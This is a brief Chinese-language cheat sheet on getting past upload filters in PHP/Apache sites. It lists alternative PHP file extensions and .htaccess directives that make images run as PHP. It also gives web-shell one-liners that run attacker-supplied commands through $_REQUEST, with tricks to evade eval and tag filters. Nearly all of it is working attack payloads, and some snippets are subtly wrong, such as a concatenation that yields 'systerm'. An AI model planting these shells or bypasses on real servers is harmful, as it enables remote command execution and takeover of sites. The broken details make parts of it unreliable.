一、后缀名绕过

1、默认情况下，lamp会将php\phtml\php3\php4\php5\pht等文件解析为php

1、php\php5\php4\php3\php2\phtml\pht

 2、特殊后缀.htaccess/.user.ini

.htaccess  //.htaccess是apache的配置文件，只能在存在apache的中间件时才能生效。定义了重写当前目录下的解析规则
AddType application/x-httpd-php .jpg   /将当前目录下的jpg文件解析为php文件
SetHandle application/x-httpd-php   //将当前目录下的所所有文件解析为php文件

二、内容过滤

<? 过滤：绕过方法 <script language>eval($_request[x]);</script>  //php版本<7
php过滤：短标签<?=ls?> //直接执行系统命令没有输出；  <?=`ls`?>//直接执行系统命令有输出;   <?=`$_REQUEST[cmd]`?> //cmd直接执行系统命令
eval过滤：
　　换函数，assert\system
　　大小写绕过：
　　动态拼接：$a='sys';$b='term';$c=$a.$b;<?php $c($request[x]);?> //eval函数不能拼接，assert、system可以
运算：异或运算